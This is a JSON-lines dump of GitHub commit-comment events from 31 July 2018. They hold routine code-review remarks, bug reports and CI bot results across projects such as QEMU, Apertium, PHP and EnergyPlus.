{"id":"8043351781","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902050,"position":288,"line":19832,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:05:41Z","updated_at":"2018-07-31T11:05:41Z","author_association":"COLLABORATOR","body":"A4"}},"created_at":"2018-07-31T11:05:41Z"}
{"id":"8043354990","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902058,"position":197,"line":19741,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:06:24Z","updated_at":"2018-07-31T11:06:24Z","author_association":"COLLABORATOR","body":"hukuki?"}},"created_at":"2018-07-31T11:06:24Z"}
{"id":"8043355200","type":"CommitCommentEvent","actor":{"login":"greglandrum"},"repo":{"name":"rdkit/knime-rdkit"},"payload":{"comment":{"id":29902060,"position":null,"line":null,"path":null,"commit_id":"4cd2d335f2c79f5d7f4791c12c6535d48b232ce9","created_at":"2018-07-31T11:06:27Z","updated_at":"2018-07-31T11:06:27Z","author_association":"MEMBER","body":"damn.\r\nOk, I just pushed a commit that should have all the version numbers updated.\r\n(I need to figure out a way to automate that process... there are *way* too many places that number needs to be changed).\r\n"}},"created_at":"2018-07-31T11:06:27Z"}
{"id":"8043364563","type":"CommitCommentEvent","actor":{"login":"Karlheinzniebuhr"},"repo":{"name":"Karlheinzniebuhr/Scrap.py"},"payload":{"comment":{"id":29902080,"position":null,"line":null,"path":null,"commit_id":"1ba12fdee996fbf7b0cd6964ccad04f147423399","created_at":"2018-07-31T11:08:31Z","updated_at":"2018-07-31T11:08:31Z","author_association":"OWNER","body":"[Python3 soporta unicode por default](https://docs.python.org/3.7/library/csv.html) "}},"created_at":"2018-07-31T11:08:31Z"}
{"id":"8043365926","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-tur"},"payload":{"comment":{"id":29902081,"position":94,"line":19666,"path":"apertium-tur.tur.lexc","commit_id":"f4fac2f52850418468736b425d3a0b62f9575153","created_at":"2018-07-31T11:08:49Z","updated_at":"2018-07-31T11:08:49Z","author_association":"COLLABORATOR","body":"probably a4 here too"}},"created_at":"2018-07-31T11:08:49Z"}
{"id":"8043365950","type":"CommitCommentEvent","actor":{"login":"sebastianbenz"},"repo":{"name":"ampproject/amp-toolbox"},"payload":{"comment":{"id":29902082,"position":7,"line":7,"path":"optimizer/spec/transformers/PruneDuplicateResourceHints/ignore_invalid_as_link/expected_output.html","commit_id":"289c5a2dae63fc0a63a40a4a964a8cdf7fe14136","created_at":"2018-07-31T11:08:49Z","updated_at":"2018-07-31T11:08:49Z","author_association":"COLLABORATOR","body":"I would've expected that the preload with the as attribute is kept instead of the invalid one."}},"created_at":"2018-07-31T11:08:49Z"}
{"id":"8043366772","type":"CommitCommentEvent","actor":{"login":"sebastianbenz"},"repo":{"name":"ampproject/amp-toolbox"},"payload":{"comment":{"id":29902084,"position":7,"line":7,"path":"optimizer/spec/transformers/PruneDuplicateResourceHints/ignore_invalid_as_link/expected_output.html","commit_id":"289c5a2dae63fc0a63a40a4a964a8cdf7fe14136","created_at":"2018-07-31T11:09:01Z","updated_at":"2018-07-31T11:09:01Z","author_association":"COLLABORATOR","body":"Am I missing something?"}},"created_at":"2018-07-31T11:09:01Z"}
{"id":"8043366992","type":"CommitCommentEvent","actor":{"login":"tigerw"},"repo":{"name":"cuberite/cuberite"},"payload":{"comment":{"id":29902085,"position":10,"line":104,"path":"Tools/ProtoProxy/CMakeLists.txt","commit_id":"757231cc6e777b8f4717d1467ef7efa01c7fde15","created_at":"2018-07-31T11:09:04Z","updated_at":"2018-07-31T11:09:04Z","author_association":"MEMBER","body":"The latest. I'm invoking configure and build in the ProtoProxy directory, nothing else changed."}},"created_at":"2018-07-31T11:09:04Z"}
{"id":"8043367225","type":"CommitCommentEvent","actor":{"login":"fazo96"},"repo":{"name":"ChluNetwork/chlu-ipfs-support"},"payload":{"comment":{"id":29902086,"position":null,"line":null,"path":null,"commit_id":"e9a35bd53ac26f39875e5dd9c6f52a4c73f73b27","created_at":"2018-07-31T11:09:08Z","updated_at":"2018-07-31T11:09:08Z","author_association":"COLLABORATOR","body":"This commit was to fix yarn somehow getting that dependency even if it was not supposed to be in the tree anymore (we are not using it anymore) because it was getting an old commit of chlu-did.\r\n\r\nEventually we can use the jsonld library, it will break browser support though. Even if we are moving heavy lifting out of the browser we still need it to be able to make signatures with the DID private key and I fear using that jsonld lib will break it.\r\n\r\nWe will be forced to look for alternatives or make our own implementation"}},"created_at":"2018-07-31T11:09:08Z"}
{"id":"8043372046","type":"CommitCommentEvent","actor":{"login":"dbradul"},"repo":{"name":"ismelyanets/python_hw"},"payload":{"comment":{"id":29902095,"position":12,"line":13,"path":"hw_34.py","commit_id":"da5dc5dcdfcfba3bc0a937dd2319b8d3f06fe3ad","created_at":"2018-07-31T11:10:10Z","updated_at":"2018-07-31T11:10:10Z","author_association":"NONE","body":"Вы каждый раз вычисляете лимит заново. Можно сделать это один раз в конструкторе."}},"created_at":"2018-07-31T11:10:10Z"}
{"id":"8043375107","type":"CommitCommentEvent","actor":{"login":"dbradul"},"repo":{"name":"ismelyanets/python_hw"},"payload":{"comment":{"id":29902108,"position":12,"line":13,"path":"hw_34.py","commit_id":"da5dc5dcdfcfba3bc0a937dd2319b8d3f06fe3ad","created_at":"2018-07-31T11:10:50Z","updated_at":"2018-07-31T11:10:50Z","author_association":"NONE","body":"0.9 - magic number, лучше хранить как константу (аттрибут класса)"}},"created_at":"2018-07-31T11:10:50Z"}
{"id":"8043377607","type":"CommitCommentEvent","actor":{"login":"markaren"},"repo":{"name":"markaren/vcpkg"},"payload":{"comment":{"id":29902113,"position":null,"line":null,"path":null,"commit_id":"cd900dcd775dcb212e84dfb60b044291a1b74b4a","created_at":"2018-07-31T11:11:24Z","updated_at":"2018-07-31T11:11:24Z","author_association":"OWNER","body":"Skal se på hva du gjorde, men fikk det til å fungere på Unix ved å bruke cmake og make direkte gjennom vcpkg_execute_required_process"}},"created_at":"2018-07-31T11:11:24Z"}
{"id":"8043382520","type":"CommitCommentEvent","actor":{"login":"kiliak"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29902140,"position":66,"line":56,"path":"DefInjected/ThoughtDef/Thoughts_Situation_Traits.xml","commit_id":"ac0f933ae3c457a6a9dc8fe6d7029d0241717b7b","created_at":"2018-07-31T11:12:28Z","updated_at":"2018-07-31T11:12:28Z","author_association":"CONTRIBUTOR","body":"Rectification faite"}},"created_at":"2018-07-31T11:12:28Z"}
{"id":"8043386717","type":"CommitCommentEvent","actor":{"login":"dbradul"},"repo":{"name":"ismelyanets/python_hw"},"payload":{"comment":{"id":29902153,"position":4,"line":5,"path":"hw_34.py","commit_id":"da5dc5dcdfcfba3bc0a937dd2319b8d3f06fe3ad","created_at":"2018-07-31T11:13:24Z","updated_at":"2018-07-31T11:13:24Z","author_association":"NONE","body":"А вот текущую заполненность вы как раз постоянно меняете, поэтому называть ее как константу не стоит.\r\nТакже лучще хранить ее как аттрибут объекта, а не класса, т.к. у каждой Годзиллы свой свой вес. Напомню, что в аттрибутах класса хранится только то, что является общим (и часто неизменным) для всех объектов класса."}},"created_at":"2018-07-31T11:13:24Z"}
{"id":"8043388855","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29902157,"position":51,"line":113,"path":"BankManagement/BankManagement/bankAPI.c","commit_id":"cbbdcdf8d218bed843d8aff5860733dceee8c997","created_at":"2018-07-31T11:13:53Z","updated_at":"2018-07-31T11:13:53Z","author_association":"NONE","body":"Hahaha LOL"}},"created_at":"2018-07-31T11:13:53Z"}
{"id":"8043388938","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29902158,"position":37,"line":37,"path":"7-3/7-3.cpp","commit_id":"984ae08e084ff4b7beffced50fd60354c2b596ec","created_at":"2018-07-31T11:13:54Z","updated_at":"2018-07-31T11:13:54Z","author_association":"COLLABORATOR","body":"if文は{}を必ず付けてください(平澤)"}},"created_at":"2018-07-31T11:13:54Z"}
{"id":"8043389848","type":"CommitCommentEvent","actor":{"login":"markaren"},"repo":{"name":"markaren/vcpkg"},"payload":{"comment":{"id":29902162,"position":null,"line":null,"path":null,"commit_id":"cd900dcd775dcb212e84dfb60b044291a1b74b4a","created_at":"2018-07-31T11:14:06Z","updated_at":"2018-07-31T11:14:06Z","author_association":"OWNER","body":"Testen porten din nå, den feiler også på Unix "}},"created_at":"2018-07-31T11:14:06Z"}
{"id":"8043389951","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29902164,"position":89,"line":71,"path":"order/tests.py","commit_id":"ef4fd3f31995d8342bf07f594c90da316c2aba76","created_at":"2018-07-31T11:14:07Z","updated_at":"2018-07-31T11:14:07Z","author_association":"NONE","body":"лучше использовать patch запрос вместо put"}},"created_at":"2018-07-31T11:14:07Z"}
{"id":"8043392835","type":"CommitCommentEvent","actor":{"login":"pmmaga"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29902170,"position":20,"line":351,"path":"UPGRADING","commit_id":"974abd8b432a3d495539ebcfb864ae7340ee0f53","created_at":"2018-07-31T11:14:45Z","updated_at":"2018-07-31T11:14:45Z","author_association":"CONTRIBUTOR","body":"Hey! Just a heads up, in the set(raw)cookie case, the first key is \"expires\", not \"lifetime\"."}},"created_at":"2018-07-31T11:14:45Z"}
{"id":"8043393893","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29902174,"position":36,"line":98,"path":"BankManagement/BankManagement/bankAPI.c","commit_id":"cbbdcdf8d218bed843d8aff5860733dceee8c997","created_at":"2018-07-31T11:14:58Z","updated_at":"2018-07-31T11:14:58Z","author_association":"NONE","body":"Still code duplication. Read about pointers to functions... I will do it with you"}},"created_at":"2018-07-31T11:14:58Z"}
{"id":"8043400170","type":"CommitCommentEvent","actor":{"login":"xxholly32"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29902192,"position":20,"line":18,"path":"bin/pull.js","commit_id":"24328d5b2c891f6aba57ee312a67976df00c0dc5","created_at":"2018-07-31T11:16:22Z","updated_at":"2018-07-31T11:16:22Z","author_association":"NONE","body":"同上"}},"created_at":"2018-07-31T11:16:22Z"}
{"id":"8043402165","type":"CommitCommentEvent","actor":{"login":"xxholly32"},"repo":{"name":"EmptyCup20/easy-tool-front"},"payload":{"comment":{"id":29902193,"position":15,"line":31,"path":"package.json","commit_id":"24328d5b2c891f6aba57ee312a67976df00c0dc5","created_at":"2018-07-31T11:16:48Z","updated_at":"2018-07-31T11:16:48Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-31T11:16:48Z"}
{"id":"8043404685","type":"CommitCommentEvent","actor":{"login":"GermanAngel"},"repo":{"name":"GermanAngel/Propaedeutikum2018"},"payload":{"comment":{"id":29902208,"position":1,"line":1,"path":"README.md","commit_id":"88b393662c287fe749ef71b3a5c3a68ba3d601e5","created_at":"2018-07-31T11:17:22Z","updated_at":"2018-07-31T11:17:22Z","author_association":"OWNER","body":"[Test.txt](https://github.com/GermanAngel/Propaedeutikum2018/files/2245061/Test.txt)\r\n"}},"created_at":"2018-07-31T11:17:22Z"}
{"id":"8043407541","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902215,"position":null,"line":null,"path":null,"commit_id":"2f1d9ab3bb11d901071eb241ceee1616192b36c6","created_at":"2018-07-31T11:18:00Z","updated_at":"2018-07-31T11:18:00Z","author_association":"NONE","body":"Is it possible to avoid the e1000e-if, and pass the QOSGraphObject for e1000e directly to the tests?"}},"created_at":"2018-07-31T11:18:00Z"}
{"id":"8043410901","type":"CommitCommentEvent","actor":{"login":"GermanAngel"},"repo":{"name":"GermanAngel/Propaedeutikum2018"},"payload":{"comment":{"id":29902220,"position":null,"line":null,"path":null,"commit_id":"88b393662c287fe749ef71b3a5c3a68ba3d601e5","created_at":"2018-07-31T11:18:48Z","updated_at":"2018-07-31T11:18:48Z","author_association":"OWNER","body":"This is a test, the exercise 5.4.3) to upload a file as a commit"}},"created_at":"2018-07-31T11:18:48Z"}
{"id":"8043410963","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902222,"position":null,"line":null,"path":null,"commit_id":"0070fb0c1529d315fd7ccae2fd0bb50125cf7216","created_at":"2018-07-31T11:18:49Z","updated_at":"2018-07-31T11:18:49Z","author_association":"NONE","body":"Just replace the existing e1000e-test.c."}},"created_at":"2018-07-31T11:18:49Z"}
{"id":"8043412045","type":"CommitCommentEvent","actor":{"login":"Daltimore"},"repo":{"name":"vueschool/vuejs-firebase-authentication"},"payload":{"comment":{"id":29902223,"position":null,"line":null,"path":null,"commit_id":"c79e9846b620b12cc08bfc2d7093b76703a7b7f3","created_at":"2018-07-31T11:19:02Z","updated_at":"2018-07-31T11:19:02Z","author_association":"NONE","body":"on line 36, change the sing in to sign it"}},"created_at":"2018-07-31T11:19:02Z"}
{"id":"8043414485","type":"CommitCommentEvent","actor":{"login":"ioneethling"},"repo":{"name":"apache/nifi"},"payload":{"comment":{"id":29902225,"position":null,"line":null,"path":null,"commit_id":"241e5411a24435ca2c39ab7bea1c5eb9ed195cb3","created_at":"2018-07-31T11:19:33Z","updated_at":"2018-07-31T11:19:33Z","author_association":"NONE","body":"Hi alopresto. In the Dockerfile you guys still have the Nifi version as 1.7.0 and if I run your apache/nifi:1.7.1 and go to Summary>System Properties> Version it also says Nifi version 1.7.0, so as I understand in the Dockerfile it goes and pulls the wrong binaries, is this so because you just haven't thought of the docker or was it just an oversight?"}},"created_at":"2018-07-31T11:19:33Z"}
{"id":"8043418331","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902231,"position":4,"line":775,"path":"tests/Makefile.include","commit_id":"3140ac9feaa28188bb2176ec15ee2536afb35ef9","created_at":"2018-07-31T11:20:23Z","updated_at":"2018-07-31T11:20:23Z","author_association":"NONE","body":"Why is it deleting the previous definition?"}},"created_at":"2018-07-31T11:20:23Z"}
{"id":"8043439112","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902307,"position":71,"line":71,"path":"tests/libqos/virtio-machine.c","commit_id":"8e5cbc922f81f37a99c7be3c2819c2564b0c0c35","created_at":"2018-07-31T11:25:02Z","updated_at":"2018-07-31T11:25:02Z","author_association":"NONE","body":"Since it's only used in the qvirtio_mmio_init_device, I'd rather not have a separate variable."}},"created_at":"2018-07-31T11:25:02Z"}
{"id":"8043439926","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902310,"position":73,"line":73,"path":"tests/libqos/virtio-machine.c","commit_id":"8e5cbc922f81f37a99c7be3c2819c2564b0c0c35","created_at":"2018-07-31T11:25:13Z","updated_at":"2018-07-31T11:25:13Z","author_association":"NONE","body":"s/MMIO_/ARM_VIRT_/"}},"created_at":"2018-07-31T11:25:13Z"}
{"id":"8043441077","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902315,"position":74,"line":74,"path":"tests/libqos/virtio-machine.c","commit_id":"8e5cbc922f81f37a99c7be3c2819c2564b0c0c35","created_at":"2018-07-31T11:25:28Z","updated_at":"2018-07-31T11:25:28Z","author_association":"NONE","body":"s/MMIO_/ARM_/"}},"created_at":"2018-07-31T11:25:28Z"}
{"id":"8043446963","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902336,"position":33,"line":28,"path":"tests/virtio-console-test.c","commit_id":"6433845f40c5561900d3c8a0560563d224f4eeb3","created_at":"2018-07-31T11:26:45Z","updated_at":"2018-07-31T11:26:45Z","author_association":"NONE","body":"Are the options copied?  If so, you can use\r\n\r\n     &(QOSGraphTestOptions){\r\n           .eopts.before_cmd_line = \"-device virtconsole,bus=vser.0\"\r\n    })\r\n\r\ndirectly in the `qos_add_test_args` line. But what does `eopts` stand for?"}},"created_at":"2018-07-31T11:26:45Z"}
{"id":"8043452226","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902358,"position":137,"line":137,"path":"tests/libqos/virtio-9p.c","commit_id":"bf0f401549b261df82014779f9664ff7003d313b","created_at":"2018-07-31T11:27:56Z","updated_at":"2018-07-31T11:27:56Z","author_association":"NONE","body":"You can use g_strdup_printf instead of GString."}},"created_at":"2018-07-31T11:27:56Z"}
{"id":"8043460189","type":"CommitCommentEvent","actor":{"login":"okurfuker"},"repo":{"name":"thilong/GameGemPackages"},"payload":{"comment":{"id":29902376,"position":null,"line":null,"path":null,"commit_id":"113c5a962033008cfb3124d2ffe4fb9b79a0a765","created_at":"2018-07-31T11:29:43Z","updated_at":"2018-07-31T11:29:43Z","author_association":"NONE","body":"ok good"}},"created_at":"2018-07-31T11:29:43Z"}
{"id":"8043462174","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902380,"position":154,"line":154,"path":"tests/libqos/virtio-9p.c","commit_id":"bf0f401549b261df82014779f9664ff7003d313b","created_at":"2018-07-31T11:30:11Z","updated_at":"2018-07-31T11:30:11Z","author_association":"NONE","body":"Is there any case where after_cmd_line includes a space and a separate option? If not, maybe rename after_cmd_line to extra_device_opts."}},"created_at":"2018-07-31T11:30:11Z"}
{"id":"8043468785","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29902405,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-31T11:31:36Z","updated_at":"2018-07-31T11:31:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T11:31:36Z"}
{"id":"8043469290","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902406,"position":60,"line":60,"path":"tests/libqos/virtio-balloon.c","commit_id":"826b128f0ee00cc24c53bf972ed878397b05c4c3","created_at":"2018-07-31T11:31:43Z","updated_at":"2018-07-31T11:31:43Z","author_association":"NONE","body":"Thinking more about it, do we actually need all these functions to be duplicate? Could we have just a single qvirtio_pci_{destroy,start_hw} and use it in all the qvirtio_pci_*_create constructor?"}},"created_at":"2018-07-31T11:31:43Z"}
{"id":"8043471268","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29902411,"position":128,"line":128,"path":"tests/libqos/virtio-balloon.c","commit_id":"826b128f0ee00cc24c53bf972ed878397b05c4c3","created_at":"2018-07-31T11:32:09Z","updated_at":"2018-07-31T11:32:09Z","author_association":"NONE","body":"No need to have it now, it would be a separate file too I think."}},"created_at":"2018-07-31T11:32:09Z"}
{"id":"8043472940","type":"CommitCommentEvent","actor":{"login":"checkmarxQA"},"repo":{"name":"checkmarxQA/CxRepository"},"payload":{"comment":{"id":29902418,"position":null,"line":null,"path":null,"commit_id":"a23cad998261c81bf63aa21ac681a2e8b5303e7c","created_at":"2018-07-31T11:32:30Z","updated_at":"2018-07-31T11:32:30Z","author_association":"OWNER","body":"Checkmarx scan results 31 Jul 2018 14:32 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://2016CITEMPLATE/CxWebClient/ViewerMain.aspx?scanid=1010011&projectid=10012\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/checkmarxQA/CxRepository/commit/a23cad998261c81bf63aa21ac681a2e8b5303e7c\">a23cad998261c81bf63aa21ac681a2e8b5303e7c</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2018-07-31T11:32:30Z"}
{"id":"8043475020","type":"CommitCommentEvent","actor":{"login":"findesgh"},"repo":{"name":"Karlheinzniebuhr/Scrap.py"},"payload":{"comment":{"id":29902422,"position":null,"line":null,"path":null,"commit_id":"1ba12fdee996fbf7b0cd6964ccad04f147423399","created_at":"2018-07-31T11:32:57Z","updated_at":"2018-07-31T11:32:57Z","author_association":"CONTRIBUTOR","body":"Fair point."}},"created_at":"2018-07-31T11:32:57Z"}
{"id":"8043475332","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29902425,"position":20,"line":351,"path":"UPGRADING","commit_id":"974abd8b432a3d495539ebcfb864ae7340ee0f53","created_at":"2018-07-31T11:33:02Z","updated_at":"2018-07-31T11:33:02Z","author_association":"CONTRIBUTOR","body":"Thanks! Fixed with bf5cf794565cf0980d5922b8ece7ad5836a07c29."}},"created_at":"2018-07-31T11:33:02Z"}
{"id":"8043479436","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29902430,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-31T11:33:57Z","updated_at":"2018-07-31T11:33:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T11:33:57Z"}
{"id":"8043484321","type":"CommitCommentEvent","actor":{"login":"michael-simons"},"repo":{"name":"neo4j/neo4j-ogm"},"payload":{"comment":{"id":29902445,"position":4,"line":190,"path":"core/src/main/java/org/neo4j/ogm/context/GraphEntityMapper.java","commit_id":"fe0911d48649487eb2d196a8b44f36314ea0313a","created_at":"2018-07-31T11:35:00Z","updated_at":"2018-07-31T11:35:00Z","author_association":"CONTRIBUTOR","body":"Awesome hint, thank you! \r\n\r\nSo, being able to have them non-public is a desired feature not only by me. That's good. How about my actual implementation? Just make them accessible? \r\n\r\nFinal: Sounds reasonable."}},"created_at":"2018-07-31T11:35:00Z"}
{"id":"8043486803","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29902449,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-31T11:35:32Z","updated_at":"2018-07-31T11:35:32Z","author_association":"OWNER","body":"And that is the problem: Most of our use is 100% correct but gcc **assumes** we are mis-using it and throws bogus warnings."}},"created_at":"2018-07-31T11:35:32Z"}
{"id":"8043487980","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":29902453,"position":null,"line":null,"path":null,"commit_id":"c8cb5959f03b14b6962ef14732a38ef6b01fb325","created_at":"2018-07-31T11:35:47Z","updated_at":"2018-07-31T11:35:47Z","author_association":"OWNER","body":"@locutus2 Thanks, please feel free to take up the idea and submit some tests, because I have only few time at disposal these days ;-)"}},"created_at":"2018-07-31T11:35:47Z"}
{"id":"8043488540","type":"CommitCommentEvent","actor":{"login":"ManuelJhp"},"repo":{"name":"ManuelJhp/ManuelJhp.github.io"},"payload":{"comment":{"id":29902455,"position":null,"line":null,"path":null,"commit_id":"d60aa636486296a3fb831d143b6883b39ee9b138","created_at":"2018-07-31T11:35:54Z","updated_at":"2018-07-31T11:35:54Z","author_association":"OWNER","body":"\r\n![desarrollador](https://user-images.githubusercontent.com/41787129/43457274-a3684154-94c6-11e8-81cc-c69a36708e38.gif)\r\n\r\n"}},"created_at":"2018-07-31T11:35:54Z"}
{"id":"8043492125","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29902463,"position":null,"line":null,"path":null,"commit_id":"0c9aefa726c7f2d94c869042697d3624f729d1a4","created_at":"2018-07-31T11:36:43Z","updated_at":"2018-07-31T11:36:43Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1706 of 1706 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.41%25-green.png)</a>\n"}},"created_at":"2018-07-31T11:36:43Z"}
{"id":"8043492135","type":"CommitCommentEvent","actor":{"login":"artemkosenko"},"repo":{"name":"artemkosenko/ngx-joyride"},"payload":{"comment":{"id":29902464,"position":null,"line":null,"path":null,"commit_id":"94ac89ecc82c3136d7807a24f8f9d771c821bb80","created_at":"2018-07-31T11:36:43Z","updated_at":"2018-07-31T11:36:43Z","author_association":"OWNER","body":"The following error occurs when a component with \"joyrideStep\" directives is placed in an inactive angular-material tab\r\n`ERROR TypeError: Failed to execute 'getComputedStyle' on 'Window': parameter 1 is not of type 'Element'.`\r\n\r\nIf <app-example-component-two> has at least one \"joyrideStep\" directive then the error will be thrown.\r\n`\r\n  <mat-tab label=\"tab1\"> <!-- active tab-->\r\n    <app-example-component-one></app-example-component-one>\r\n  </mat-tab>\r\n  <mat-tab label=\"tab2\"> <!-- inactive tab-->\r\n    <app-example-component-two></app-example-component-two>\r\n  </mat-tab>\r\n`\r\n\r\n\r\n"}},"created_at":"2018-07-31T11:36:43Z"}
{"id":"8043492838","type":"CommitCommentEvent","actor":{"login":"alevelSoroka"},"repo":{"name":"alevelSoroka/Work"},"payload":{"comment":{"id":29902468,"position":null,"line":null,"path":null,"commit_id":"32204d4f744b5f5b22468c8578389a1b869b21df","created_at":"2018-07-31T11:36:53Z","updated_at":"2018-07-31T11:36:53Z","author_association":"OWNER","body":"kkkk"}},"created_at":"2018-07-31T11:36:53Z"}
